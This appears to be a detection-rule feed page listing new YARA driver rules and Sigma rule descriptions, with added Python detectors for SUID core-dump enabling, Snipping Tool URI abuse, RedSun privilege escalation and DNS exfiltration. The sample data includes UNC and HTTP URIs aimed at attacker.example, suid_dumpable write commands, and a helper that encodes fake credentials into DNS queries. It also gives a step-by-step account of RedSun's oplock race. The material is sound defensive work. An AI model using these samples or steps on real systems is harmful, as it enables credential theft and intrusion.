currently serving 24038 YARA rules and 4578 Sigma rules
Newest YARA Rules
This table shows the newest additions to the YARA rule set. Every rule listed here was added on 28.04.2026 and detects a driver listed in the LOLDrivers project by matching VersionInfo values from the PE header; PUA_VULN_ rules cover vulnerable drivers, MAL_ rules cover drivers classified as malicious. Investigate matches in context: expected filenames or standard vendor/system driver locations can be lower priority, while unexpected filenames or paths are more suspicious.
Rule | Type | Driver file(s) named in the rule
PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_019C | vulnerable | cpuz.sys
PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_0484 | vulnerable | cpuz.sys
PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_11A4 | vulnerable | cpuz.sys
MAL_Driver_Microsoftcorporation_Ntbiosys_Microsoftrwindowsrntoperatingsystem_96BF | malicious | ntbios.sys
PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_1E16 | vulnerable | cpuz.sys
MAL_Driver_Microsoftcorporation_Wantdsys_Microsoftwindowsoperatingsystem_06A0 | malicious | wantd.sys
PUA_VULN_Driver_Phoenixtechnologies_Agentsys_Driveragent_05F0 | vulnerable | Agent64.sys
PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_6C5C | vulnerable | cpuz.sys
MAL_Driver_Microsoftcorporation_Windbgsys_Microsoftwindowsoperatingsystem_06C5 | malicious | windbg.sys
PUA_VULN_Driver_Powertool_Kevpsys_Powertool_09B0 | vulnerable | kEvP64.sys
MAL_Driver_Microsoftcorporation_Wintapixsys_Microsoftwindowsoperatingsystem_1485 | malicious | WinTapix.sys, SRVNET2.SYS
PUA_VULN_Driver_Razerinc_Rzpnk_Rzpnk_0507 | vulnerable | rzpnk.sys
PUA_VULN_Driver_Razerinc_Rzpnk_Rzpnk_0B54 | vulnerable | rzpnk.sys
PUA_VULN_Driver_Razerinc_Rzpnk_Rzpnk_0C92 | vulnerable | rzpnk.sys
PUA_VULN_Driver_Razerinc_Rzpnk_Rzpnk_2665 | vulnerable | rzpnk.sys
PUA_VULN_Driver_Razerinc_Rzpnk_Rzpnk_8ED0 | vulnerable | rzpnk.sys
PUA_VULN_Driver_Elaboratebytesag_Elbycdio_Cdrtools_7227 | vulnerable | elbycdio.sys
PUA_VULN_Driver_Realtek_Rtkiosys_Realtekiodriver_3E1F | vulnerable | rtkio.sys, rtkio64.sys, rtkiow8x64.sys, rtkiow10x64.sys
PUA_VULN_Driver_Fintekcorp_Fintekcorpfintekpcieuart_1794 | vulnerable | FPCIE2COM.sys
PUA_VULN_Driver_Geintelligentplatformsinc_Gedevicedriver_Proficymachineedition_Build_5114 | vulnerable | GEDevDrv.SYS
PUA_VULN_Driver_Rweverything_Rwdrvsys_Rwdrvdriver_1E0E | vulnerable | RwDrv.sys
PUA_VULN_Driver_Getactechnologycorporation_Mtcbsvsys_Getacsystemserviceprovider_4B46 | vulnerable | GtcKmdfBs.sys
PUA_VULN_Driver_Rweverything_Rwdrvsys_Rweverythingreadwritedriver_0AAF | vulnerable | AsrRapidStartDrv.sys
PUA_VULN_Driver_Highresolutionenterpriseswwwhighrezcouk_Inpoutsys_Inpoutdriverversion_1636 | vulnerable | inpout32.sys
PUA_VULN_Driver_Highresolutionenterpriseswwwhighrezcouk_Inpoutxsys_Inpoutxdriverversion_X_2D83 | vulnerable | inpoutx64.sys
PUA_VULN_Driver_Inferre_Hwdetectngsys_Hwdetectngsys_2F8B | vulnerable | hwdetectng.sys
PUA_VULN_Driver_Sysinternalswwwsysinternalscom_Procexpsys_Processexplorer_3503 | vulnerable | procexp.Sys
PUA_VULN_Driver_Sysinternalswwwsysinternalscom_Procexpsys_Processexplorer_3C7E | vulnerable | procexp.Sys
PUA_VULN_Driver_Insydesoftwarecorp_Segwindrvxsys_Segwindowsdriverx_0D30 | vulnerable | segwindrvx64.sys
PUA_VULN_Driver_Tenasyscorporation_Rtifsys_Intime_0D13 | vulnerable | rtif.sys
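The triage advice repeated for every driver rule above (expected file name in a standard driver location is lower priority, unexpected name or path is more suspicious) can be applied mechanically to the matches the yara CLI prints. The script below is an added example for this page, not Valhalla or LOLDrivers code: the expected file names are taken from the table, while the list of standard driver directories, the staging-directory pattern and the priority thresholds are assumptions to adapt per environment.

```python
"""Triage helper for LOLDrivers-style YARA driver matches.

Added example for this page, not Valhalla or LOLDrivers code. The list of
standard driver locations, the staging-directory pattern and the priority
thresholds are assumptions; the expected file names come from the table above.
"""
import ntpath
import re

# Driver file names per rule, as given in the rule descriptions (three rules shown).
EXPECTED_DRIVER = {
    "PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_019C": {"cpuz.sys"},
    "MAL_Driver_Microsoftcorporation_Ntbiosys_Microsoftrwindowsrntoperatingsystem_96BF": {"ntbios.sys"},
    "PUA_VULN_Driver_Realtek_Rtkiosys_Realtekiodriver_3E1F": {
        "rtkio.sys", "rtkio64.sys", "rtkiow8x64.sys", "rtkiow10x64.sys",
    },
}

# Where a vendor or system driver is expected to live (assumption; extend per environment).
STANDARD_DRIVER_DIRS = (
    r"c:\windows\system32\drivers",
    r"c:\windows\system32\driverstore\filerepository",
    r"c:\program files",
    r"c:\program files (x86)",
)
# User-writable directories commonly used to stage a BYOVD driver (assumption).
STAGING_DIR_RE = re.compile(r"\\(temp|tmp|downloads|public)\\")


def triage(rule, path):
    """Return (priority, reasons) for one YARA match on a driver file."""
    reasons = []
    norm = path.replace("/", "\\").lower()
    name = ntpath.basename(norm)
    expected = {n.lower() for n in EXPECTED_DRIVER.get(rule, ())}
    is_mal = rule.startswith("MAL_")
    if is_mal:
        reasons.append("rule classifies the driver itself as malicious, not merely vulnerable")
    if expected and name not in expected:
        reasons.append(f"file name {name!r} differs from the expected {sorted(expected)}")
    if not any(norm.startswith(d + "\\") for d in STANDARD_DRIVER_DIRS):
        reasons.append("path is outside standard driver locations")
    if STAGING_DIR_RE.search(norm):
        reasons.append("path is in a user-writable staging directory")
    if is_mal or len(reasons) >= 2:
        return "high", reasons
    if reasons:
        return "medium", reasons
    return "low", ["expected file name in a standard location; still confirm which process loaded it"]


def triage_yara_output(lines):
    """Parse 'rule path' lines as printed by the yara CLI and triage each match."""
    results = []
    for line in lines:
        rule, _, path = line.strip().partition(" ")
        priority, reasons = triage(rule, path)
        results.append((rule, path, priority, reasons))
    return results


# Constructed sample output of a recursive yara scan with the driver rules.
SAMPLE_OUTPUT = [
    r"PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_019C C:\Windows\System32\drivers\cpuz.sys",
    r"PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_019C C:\Users\bob\AppData\Local\Temp\upd.sys",
    r"PUA_VULN_Driver_Realtek_Rtkiosys_Realtekiodriver_3E1F C:\Program Files\Realtek\rtkio64.sys",
    r"MAL_Driver_Microsoftcorporation_Ntbiosys_Microsoftrwindowsrntoperatingsystem_96BF C:\Windows\System32\drivers\ntbios.sys",
]

if __name__ == "__main__":
    for rule, path, priority, reasons in triage_yara_output(SAMPLE_OUTPUT):
        print(f"{priority:6} {path}\n       {rule}\n       - " + "\n       - ".join(reasons))
```

A renamed copy of cpuz.sys in a Temp directory scores high on two independent grounds (wrong name, staging path), while the same driver under System32\drivers scores low; the MAL_ rules are never downgraded by location, because a malicious driver in the right directory is still malicious.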
Successful YARA Rules in Set
This table shows statistics for the best-performing rules, i.e. those whose matches have the lowest average AV detection rate (rules created in the last 12 months, matches of the last 14 days).
Rule | Average AV Detection Rate | Sample Count | Info | VT
Latest YARA Matches with Low AV Detection Rate
This table lists the last matches with low AV detection rates (between 0 and 15 AV engines matched)
Rule | AVs | Hash
SUSP_Encoded_WriteProcessMemory_FileOnly | 3 | c5c68556e7609f65f2d0f002561cec20884f740e7a80847d497226fe6e929984
SUSP_Encoded_Registry_Key_Paths_Sep22_1 | 3 | c5c68556e7609f65f2d0f002561cec20884f740e7a80847d497226fe6e929984
SUSP_OBFUSC_PS1_Encoded_PowerShell_Commands_Apr22_1 | 3 | c5c68556e7609f65f2d0f002561cec20884f740e7a80847d497226fe6e929984
SUSP_Encoded_DisableRealtimeMonitoring_Mar20 | 3 | c5c68556e7609f65f2d0f002561cec20884f740e7a80847d497226fe6e929984
SUSP_Encoded_WriteProcessMemory_Ext1 | 3 | c5c68556e7609f65f2d0f002561cec20884f740e7a80847d497226fe6e929984
SUSP_PS1_Loader_Indicator_Nov21_3 | 2 | 5e4e131c7096fcc49b912eea2db2a7cb2d0c6929960f9fb0a8183425906b6305
SUSP_OBFUSC_PowerShell_Indicator_Jun20_1 | 6 | 7f5fae6b593a565004e3ebe05449f7de18e68b2719fea3cc8e2783f53cb45912
SUSP_OBFUSC_PowerShell_Indicator_Jun20_1 | 2 | 5e4e131c7096fcc49b912eea2db2a7cb2d0c6929960f9fb0a8183425906b6305
SUSP_FromBase64_StartProcess_Combo_Mar21_1 | 6 | 7f5fae6b593a565004e3ebe05449f7de18e68b2719fea3cc8e2783f53cb45912
SUSP_PS1_Command_Rare_CmdLine_Arguments_Jan20 | 2 | 5e4e131c7096fcc49b912eea2db2a7cb2d0c6929960f9fb0a8183425906b6305
SUSP_OBFUSC_PowerShell_Indicator_Jun20_1 | 4 | 38e2a1685b3a564f8e5c4982ba9db341ae991fdcec2a7736b409cfc8179bdd08
YARA Rules Per Category
This list shows the number of YARA rules in the subscribable categories (categories overlap as a rule can be in 'n' categories)
Malware: 7591
Threat Hunting (not subscribable, only in THOR scanner): 5893
APT: 5055
Hacktools: 4858
Webshells: 2402
Exploits: 722
Newest Sigma Rules
This table shows the newest additions to the Sigma rule set
Rule | Description | Date
Kubernetes Potential Enumeration Activity
Detects potential Kubernetes enumeration or attack activity via the audit log.
This includes the execution of common shells, utilities, or specialized tools like 'Rakkess' (access_matrix) and 'TruffleHog' via Kubernetes API requests.
Attackers use these methods to perform reconnaissance (enumeration), secret harvesting, or execute code (exec) within a cluster.
28.04.2026
Google Workspace Out Of Domain Email Forwarding
Detects automatic email forwarding to external domains in Google Workspace, which may indicate data leakage or misuse.
28.04.2026
Google Workspace Government Attack Warning
Detects a login attempt in Google Workspace flagged as a potential attack by a government-backed threat actor.
28.04.2026
Suspicious Login Activity Classified By Google
Detects Google Workspace login activity that's classified as suspicious by Google.
28.04.2026
Cisco Dot1x Disabled
Detects the manual disablement of IEEE 802.1X (dot1x) on a Cisco network device interface.
Disabling dot1x bypasses Network Access Control (NAC) mechanisms, potentially allowing unauthorized devices to gain access to the internal network.
This activity is a common technique used by attackers or malicious insiders to establish persistence or perform lateral movement via rogue devices.
28.04.2026
Potential Exploitation of CVE-2025-5054 or CVE-2025-4598
Detects attempts to enable core dumps for set-user-ID (SUID) processes by modifying the system file /proc/sys/fs/suid_dumpable, typically by setting its value to 1 or 2.
Enabling this feature allows memory dumps (core dumps) of SUID processes, which usually run with elevated privileges.
These dumps may contain sensitive information such as passwords, cryptographic keys or other secrets.
CVE-2025-5054: Information leak via core dumps from SUID binaries using apport.
CVE-2025-4598: Information disclosure in systemd-coredump due to insecure handling of SUID process memory dumps.
28.04.2026
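The detection logic described in that rule, run over sample process events, as an added example (not Nextron's Sigma rule). It distinguishes writes that enable SUID dumps (values 1 and 2, whether through a shell redirection, tee, sysctl -w or a persisted sysctl.conf entry) from reads and from hardening writes of 0. The event format and field names are constructed.

```python
"""Detection logic for attempts to enable SUID core dumps (preparation for
CVE-2025-5054 / CVE-2025-4598 exploitation).

Added example, not Nextron's Sigma rule; the linux/process_creation events
below are constructed and the field names are assumptions.
"""
import re

SUID_DUMPABLE_PATH = re.compile(r"/proc/sys/fs/suid_dumpable\b")
# sysctl -w fs.suid_dumpable=2, or the same key persisted in sysctl.conf / sysctl.d
SYSCTL_ASSIGN = re.compile(r"\bfs\.suid_dumpable\s*=\s*([0-9]+)")
# echo 2 > /proc/sys/fs/suid_dumpable, printf '1' | sudo tee /proc/sys/fs/suid_dumpable
SHELL_WRITE = re.compile(
    r"\b(?:echo|printf)\s+['\"]?([0-9]+)['\"]?[^;|>]*(?:>|\|\s*(?:sudo\s+)?tee)\s*[^;]*?/proc/sys/fs/suid_dumpable"
)


def requested_value(cmdline):
    """Value the command line writes to suid_dumpable, or None if it only reads it or is unrelated."""
    m = SYSCTL_ASSIGN.search(cmdline)
    if m and re.search(r"\bsysctl\b", cmdline):
        return int(m.group(1))
    if SUID_DUMPABLE_PATH.search(cmdline):
        m = SHELL_WRITE.search(cmdline)
        if m:
            return int(m.group(1))
    return None


def is_suspicious(cmdline):
    """1 (debug) and 2 (suidsafe) enable dumps of SUID processes; 0 disables them."""
    return requested_value(cmdline) in (1, 2)


def scan(events):
    """Return (user, cmdline, value) for every event that tries to enable SUID dumps."""
    return [(e["user"], e["cmdline"], requested_value(e["cmdline"]))
            for e in events if is_suspicious(e["cmdline"])]


EVENTS = [  # constructed
    {"user": "www-data", "cmdline": "sh -c 'echo 2 > /proc/sys/fs/suid_dumpable'"},
    {"user": "alice", "cmdline": "cat /proc/sys/fs/suid_dumpable"},
    {"user": "root", "cmdline": "sysctl -w fs.suid_dumpable=0"},
    {"user": "bob", "cmdline": "printf '1' | sudo tee /proc/sys/fs/suid_dumpable"},
    {"user": "bob", "cmdline": "sysctl -w fs.suid_dumpable=2"},
    {"user": "alice", "cmdline": "sysctl fs.suid_dumpable"},
]

if __name__ == "__main__":
    for user, cmdline, value in scan(EVENTS):
        print(f"ALERT user={user} suid_dumpable={value}: {cmdline}")
```

Only the www-data and the two bob events fire; the read by alice and root's write of 0 are ignored, which is the difference between this check and a naive "command line contains suid_dumpable" match.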
Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI
Detects potential exploitation of CVE-2026-33829, a vulnerability in the Windows Snipping Tool URI handler (ms-screensketch:).
An attacker can abuse the 'filePath' parameter to supply a UNC path or HTTP URL, causing SnippingTool.exe to initiate a connection to a remote resource.
When a UNC path is used (e.g. \\attacker.com\share), this triggers an outbound NTLM authentication attempt, allowing the attacker to capture or relay the victim's Net-NTLMv2 hash.
HTTP-based paths may result in remote file loading or server-side request forgery (SSRF)-style access.
The URI can be delivered via a malicious hyperlink, phishing email, or web page.
28.04.2026
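To triage a SnippingTool.exe launch it helps to pull the filePath parameter out of the ms-screensketch: URI and decide whether it points at a UNC share (outbound NTLM authentication), an HTTP resource, or a local file. The classifier below is an added example, not Nextron's Sigma rule; all URIs and the process event are constructed and the verdict names are my own.

```python
"""Classify ms-screensketch: URIs by where their filePath parameter points
(CVE-2026-33829 triage).

Added example, not Nextron's Sigma rule; every URI and process event here is
constructed, and the verdict names are my own.
"""
import re
from urllib.parse import parse_qs

SCHEME = "ms-screensketch:"
URI_RE = re.compile(r"ms-screensketch:[^\s\"']*", re.I)


def file_path_param(uri):
    """Return the percent-decoded filePath value of an ms-screensketch: URI, or None."""
    if not uri.lower().startswith(SCHEME):
        return None
    _, _, query = uri[len(SCHEME):].partition("?")
    for key, values in parse_qs(query, keep_blank_values=True).items():
        if key.lower() == "filepath" and values:
            return values[0]
    return None


def classify(uri):
    """Return (verdict, path).

    'unc'   : \\\\host\\share path, SnippingTool.exe authenticates outbound (NTLM capture/relay)
    'http'  : remote fetch / SSRF-style access
    'local' : drive-letter or relative path, benign-looking
    'none'  : no filePath parameter
    """
    path = file_path_param(uri)
    if path is None:
        return "none", None
    if re.match(r"https?://", path.strip(), re.I):
        return "http", path
    if path.strip().replace("/", "\\").startswith("\\\\"):
        return "unc", path
    return "local", path


def triage_process_event(image, cmdline):
    """Verdict for a process_creation event of SnippingTool.exe carrying the URI on its command line."""
    if not image.lower().endswith("\\snippingtool.exe"):
        return "not-snippingtool", None
    m = URI_RE.search(cmdline)
    return classify(m.group(0)) if m else ("none", None)


SAMPLES = [  # constructed
    "ms-screensketch:edit?filePath=%5C%5Cattacker.example%5Cshare%5Cpic.png&sharedId=1",
    "ms-screensketch:edit?filePath=http://attacker.example/pic.png",
    "ms-screensketch:edit?FilePath=C:%5CUsers%5Cbob%5CPictures%5Cshot.png",
    "ms-screensketch:",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(classify(uri), "<-", uri)
```

The percent-decoding matters: a phishing link will usually carry %5C%5C rather than literal backslashes, and a forward-slash form (//host/share) is also a UNC path to Windows, so both are normalised before the check.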
Sensitive File Dump Via Print.EXE
Detects abuse of the Print.exe utility for credential harvesting: Print.exe is used to copy sensitive files such as ntds.dit, SAM, SECURITY or SYSTEM out of the Windows directory so that credentials can be extracted from them, locally or remotely.
28.04.2026
Suspicious Task Scheduler XML Pattern Related with AtExec
Detects creation of scheduled tasks with XML patterns commonly associated with Atexec,
a component of the NetExec tool that allows execution of commands via scheduled tasks for persistence and privilege escalation.
27.04.2026
Suspicious Certificate Request Pattern via CertReq
Detects suspicious certificate request patterns that may indicate abuse of certreq.exe for privilege escalation or lateral movement.
27.04.2026
Indirect Command Execution via SFTP ProxyCommand
Detects the use of SFTP.exe to execute commands indirectly via the ProxyCommand parameter.
Threat actors were seen leveraging this legitimate Windows binary to bypass security controls and execute arbitrary commands while evading detection.
27.04.2026
PUA - Memory Dump Mount Via MemProcFS
Detects execution of MemProcFS, a memory forensics tool, with the '-device' parameter.
MemProcFS mounts physical memory as a virtual file system, allowing direct access to process memory and system structures.
Threat actors were seen abusing this utility to mount memory dumps and then extract sensitive information from processes like LSASS or extract registry hives to obtain credentials, LSA secrets, SAM data, and cached domain credentials.
MemProcFS usage that is not part of authorized forensic analysis should be treated as suspicious and warrants further investigation.
27.04.2026
Service Startup Type Change Via Wmic.EXE
Detects changes to service startup type to 'disabled' or 'manual' using the WMIC command-line utility.
27.04.2026
RedSun - TieringEngineService.exe Detected as EICAR Test File
Detects Windows Defender (EventID 1119 - Remediation Action Failed) flagging TieringEngineService.exe
dropped in a characteristic RS-{GUID} temporary directory, or the RedSun.exe process itself being present.
This covers the staging pattern used by RedSun, a Cloud Files API and opportunistic lock (oplock) based
AV bypass/privilege escalation tool.
RedSun works as follows:
1. Registers a Cloud Files sync root and creates a Cloud Files placeholder for TieringEngineService.exe under %TEMP%\RS-{GUID}\
2. The placeholder file carries EICAR test file content (Virus:DOS/EICAR_Test_File) to reliably trigger
a Defender scan and remediation attempt
3. Requests a batch oplock (FSCTL_REQUEST_BATCH_OPLOCK) on the placeholder file
4. When Defender attempts to scan/quarantine the file, the oplock triggers - holding the file open
5. During the oplock break window, RedSun swaps the mount point (junction) to redirect
\\?\C:\Windows\System32 to the attacker-controlled temp path
6. This races the AV/OS into executing the malicious TieringEngineService.exe with elevated privileges
17.04.2026
RedSun - Conhost.exe Spawned by TieringEngineService.exe
Detects two stages of the RedSun post-exploitation process chain that deliver a SYSTEM-level shell to the attacker's interactive session.
Observed process chain:
services.exe
→ TieringEngineService.exe
→ conhost.exe (SYSTEM, CommandLine: bare path, no arguments)
→ cmd.exe / shell (SYSTEM, TerminalSessionId = attacker's session)
Stage 1 — TieringEngineService.exe spawns argument-less conhost.exe:
After winning the oplock + Cloud Files mount point race, the malicious TieringEngineService.exe (RedSun.exe copied to System32, started via CoCreateInstance
/ services.exe) detects it is NT AUTHORITY\SYSTEM and calls LaunchConsoleInSessionId().
This opens \\.\pipe\REDSUN, reads the attacker's session ID, duplicates the SYSTEM token, re-stamps it with that session ID via SetTokenInformation(TokenSessionId), then
calls CreateProcessAsUser to spawn conhost.exe with no arguments.
Stage 2 — Shell spawned from rogue conhost.exe (EDR sources with GrandParentImage):
The rogue SYSTEM conhost.exe spawns a shell (cmd.exe, PowerShell, etc.) as SYSTEM in the attacker's interactive session.
On EDR sources that expose GrandParentImage, the full three-level chain (TieringEngineService.exe → conhost.exe → shell) can be matched directly.
The legitimate TieringEngineService.exe is a headless COM server that is unlikely to spawn conhost.exe under normal conditions.
17.04.2026
RedSun - Named Pipe Created
Detects the creation of a named pipe with the hardcoded name "REDSUN".
The RedSun exploit tool uses a pipe with this name for synchronisation and command communication between its components during the Cloud Files API + oplock-based AV bypass and privilege escalation chain.
RedSun creates the pipe as \\??\pipe\REDSUN.
The pipe server listens for the token-duplicated elevated process to connect and respond, completing the privilege escalation from user to SYSTEM.
Presence of this pipe name indicates active or recent RedSun execution.
17.04.2026
RedSun - TieringEngineService.exe Staged in RS-Prefixed Temp Dir
Detects the creation of a file named TieringEngineService.exe inside a directory whose path contains the RS- prefix characteristic
of RedSun's staging directory (e.g. %TEMP%\RS-{GUID}\TieringEngineService.exe).
RedSun registers a Cloud Files sync root under this RS-prefixed path and drops a masqueraded placeholder there as part of its oplock-based AV bypass and privilege escalation chain.
The RS-{GUID} directory name is generated by RedSun itself and has no legitimate system usage,
making the combination of this path prefix and the TieringEngineService.exe filename a highly
specific indicator of RedSun activity.
17.04.2026
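The four RedSun rules above describe three on-host indicators: the TieringEngineService.exe -> argument-less conhost.exe -> shell process chain, the RS-{GUID} staging directory, and the REDSUN pipe name. The script below implements all three as an added example (not Nextron's Sigma rules) over a constructed set of process events; the event field names are assumptions, and the RS-{GUID} directory is assumed to use the usual 8-4-4-4-12 hexadecimal GUID layout, with or without braces.

```python
"""Detection helpers for the RedSun indicators described in the four rules above:
the TieringEngineService.exe -> bare conhost.exe -> shell process chain, the
RS-{GUID} staging path and the REDSUN named pipe.

Added example, not Nextron's Sigma rules. The process events are constructed,
the field names are assumptions, and the RS-{GUID} directory is assumed to use
the usual 8-4-4-4-12 hexadecimal GUID layout, with or without braces.
"""
import ntpath
import re

GUID = r"\{?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}?"
STAGING_RE = re.compile(r"\\RS-" + GUID + r"\\TieringEngineService\.exe$", re.I)
PIPE_RE = re.compile(r"(?:^|\\)REDSUN$", re.I)  # pipe names are case-insensitive on Windows
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SYSTEM = r"NT AUTHORITY\SYSTEM"


def is_redsun_staging_path(path):
    """%TEMP%\\RS-{GUID}\\TieringEngineService.exe (file_event TargetFilename)."""
    return bool(STAGING_RE.search(path))


def is_redsun_pipe(name):
    """\\REDSUN, \\??\\pipe\\REDSUN or \\\\.\\pipe\\REDSUN (pipe_created PipeName)."""
    return bool(PIPE_RE.search(name))


def _base(image):
    return ntpath.basename(image).lower()


def is_bare_invocation(event):
    """True when the command line is only the image path, with no arguments."""
    cmd = event["cmdline"].strip().strip('"').lower()
    return cmd in {event["image"].lower(), _base(event["image"])}


def detect_redsun_chain(events):
    """Return (tiering_pid, conhost_pid, shell_pid_or_None) for every
    TieringEngineService.exe -> argument-less conhost.exe [-> shell] chain.
    Stage 1 needs only parent/child; stage 2 is the grandparent match."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if _base(e["image"]) != "conhost.exe" or not is_bare_invocation(e):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or _base(parent["image"]) != "tieringengineservice.exe":
            continue
        shells = [c["pid"] for c in events if c["ppid"] == e["pid"] and _base(c["image"]) in SHELLS]
        hits.append((parent["pid"], e["pid"], shells[0] if shells else None))
    return hits


EVENTS = [  # constructed process_creation events
    {"pid": 700, "ppid": 4, "image": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\System32\services.exe", "user": SYSTEM, "session": 0},
    {"pid": 4100, "ppid": 700, "image": r"C:\Windows\System32\TieringEngineService.exe",
     "cmdline": r"C:\Windows\System32\TieringEngineService.exe", "user": SYSTEM, "session": 0},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\System32\conhost.exe", "user": SYSTEM, "session": 1},
    {"pid": 4130, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe", "user": SYSTEM, "session": 1},
    # benign: a user's cmd.exe spawning conhost.exe with its usual arguments
    {"pid": 4900, "ppid": 3000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir", "user": r"CORP\bob", "session": 1},
    {"pid": 5000, "ppid": 4900, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"\??\C:\Windows\system32\conhost.exe 0x4", "user": r"CORP\bob", "session": 1},
]

if __name__ == "__main__":
    print(detect_redsun_chain(EVENTS))
```

The bare-command-line check is what keeps the ordinary conhost.exe (always launched with arguments by the console host machinery) out of the results; the parent check alone would still be specific, since the legitimate TieringEngineService.exe is headless, but the two together match the rule's description exactly.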
Potential C2 via Steam Community Page
Detects suspicious DNS queries to steamcommunity.com that may indicate use of a Steam Community profile page as a dead-drop resolver: the malware retrieves the domain or IP address of its command-and-control (C2) server from the page content.
This technique has been observed in various malware families, including CastleRAT, Lumma and others.
15.04.2026
Potential Rogue Virtual Machine Execution via VMX
Detects potential rogue virtual machine execution via direct vmx binary execution with -x argument, which bypasses vCenter visibility and registration workflows.
This technique may be used by adversaries to maintain persistence within a virtualized environment.
09.04.2026
Credential Dumping via Volatility Framework
Detects potential credential dumping activities using the Volatility memory forensics framework.
09.04.2026
HackTool - NetExec File Indicators
Detects file creation events indicating NetExec (nxc.exe) execution on the local machine.
NetExec is a PyInstaller-bundled binary that extracts its embedded data files to a "_MEI<random>" directory
under the Temp folder upon execution. Files dropped under the "\nxc\" sub-directory of that
extraction path are unique to NetExec and serve as reliable on-disk indicators of execution.
NetExec (formerly CrackMapExec) is a widely used post-exploitation and lateral movement tool used for
Active Directory enumeration, credential harvesting, and remote code execution.
08.04.2026
Registry Query for Installed Software via Reg.Exe
Detects usage of reg.exe to enumerate installed software via registry queries.
Adversaries may use reg.exe to query registry keys that list installed software as part of their reconnaissance activities to identify potential targets or gather information about the software environment.
03.04.2026
Potential IIS Reconnaissance via AppCmd.Exe Utility
Detects potential reconnaissance activity targeting Internet Information Services (IIS) web servers through the use of the AppCmd.exe utility.
AppCmd.exe is a command-line tool used for managing IIS configurations and can be leveraged by attackers to gather information about the server environment, including sites, application pools, and modules.
03.04.2026
Suspicious CMD Echo of JavaScript Script Tag to File or Pipe
Detects usage of 'cmd /c echo <script...' with output redirected to a file or piped which may indicate suspicious JavaScript injection or script drop activity or one-liner script execution attempts.
Attackers may use this technique to create or execute JavaScript code on the target system, potentially for malicious purposes such as downloading and executing additional payloads, or for persistence.
Investigation of such events should consider the context of the command execution, including the content being echoed and the destination of the output.
03.04.2026
Potential User Profile Reconnaissance via CommandLine
Detects potential user profile reconnaissance activity by identifying command-line executions of 'cmd.exe' and 'reg.exe' that query user directories and registry keys associated with user profiles.
03.04.2026
Suspicious Download and Execution Pattern via VSCode/Cursor Tasks - Linux
Detects suspicious patterns where Visual Studio Code or Cursor spawns processes that both download and execute files, which may indicate abuse of the `tasks.json` configuration for malicious purposes.
This technique has been observed in campaigns such as "Contagious Interview," where adversaries leverage VSCode's workspace trust model to execute arbitrary code by embedding malicious commands in `tasks.json`.
Attackers may craft or alter `tasks.json` to automatically trigger downloads and execution of payloads when a user opens and trusts a workspace in VSCode or Cursor, enabling initial access or further compromise.
02.04.2026
DNS Exfiltration via DNSExfiltrator - Network
Detects DNS exfiltration activity using the DNSExfiltrator tool, which splits the data into chunks, encodes each chunk (base32 or base64url) and sends the chunks as subdomain labels in DNS queries to an attacker-controlled domain.
02.04.2026
Unusually Long DNS Query - Network
Detects unusually long DNS queries that may indicate DNS tunneling, data exfiltration attempts, or C2 communication.
Usage of DNS for C&C communication or data exfiltration often involves crafting long DNS queries to encode information.
02.04.2026
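The two DNS rules above rest on the same observation: encoding data into query names produces long names and long, alphabet-constrained labels. The script below is an added example (not Nextron's Sigma rules) that computes those features over a few constructed query names, one of them built the way DNSExfiltrator builds its queries (chunk, base32-encode, one label per chunk). The length thresholds are assumptions to tune against your own DNS baseline.

```python
"""Length/encoding heuristics for DNS tunnelling and DNSExfiltrator-style queries.

Added example, not Nextron's Sigma rules. The thresholds are assumptions and the
sample queries are constructed; the exfil query is built the way DNSExfiltrator
builds it (data chunked, base32-encoded, sent as subdomain labels).
"""
import base64
import math
import re
from collections import Counter

LONG_QUERY_LEN = 100    # total query name length (assumption)
LONG_LABEL_LEN = 40     # longest single label (assumption; the DNS maximum is 63)
BASE32_LABEL = re.compile(r"^[a-z2-7]+$", re.I)
BASE64URL_LABEL = re.compile(r"^[a-z0-9_-]+$", re.I)


def shannon_entropy(s):
    if not s:
        return 0.0
    counts = Counter(s.lower())
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def analyze(qname):
    """Return features plus a 'suspicious' verdict for one query name."""
    labels = qname.rstrip(".").split(".")
    subdomain = "".join(labels[:-2])  # everything left of the registered domain (approximation)
    longest = max(len(lab) for lab in labels)
    encoded = sum(1 for lab in labels[:-2]
                  if len(lab) >= 32 and (BASE32_LABEL.match(lab) or BASE64URL_LABEL.match(lab)))
    reasons = []
    if len(qname) >= LONG_QUERY_LEN:
        reasons.append(f"query length {len(qname)} >= {LONG_QUERY_LEN}")
    if longest >= LONG_LABEL_LEN:
        reasons.append(f"label length {longest} >= {LONG_LABEL_LEN}")
    if encoded >= 2:
        reasons.append(f"{encoded} long encoded-looking labels")
    return {"qname": qname, "length": len(qname), "longest_label": longest,
            "subdomain_entropy": round(shannon_entropy(subdomain), 2),
            "suspicious": bool(reasons), "reasons": reasons}


def build_exfil_query(data, domain="exfil.example.net", chunk=30):
    """Mimic DNSExfiltrator: chunk, base32-encode, strip padding, one label per chunk."""
    labels = [base64.b32encode(data[i:i + chunk]).decode().rstrip("=")
              for i in range(0, len(data), chunk)]
    return ".".join(labels + [domain])


PAYLOAD = b"user=admin;pass=hunter2;host=db01.corp.local;role=dba"  # constructed
QUERIES = [  # constructed
    "www.example.com",
    "update-service-eu-west-1.prod.cdn.example.com",
    build_exfil_query(PAYLOAD),
]


def scan(queries):
    return [r for r in map(analyze, queries) if r["suspicious"]]


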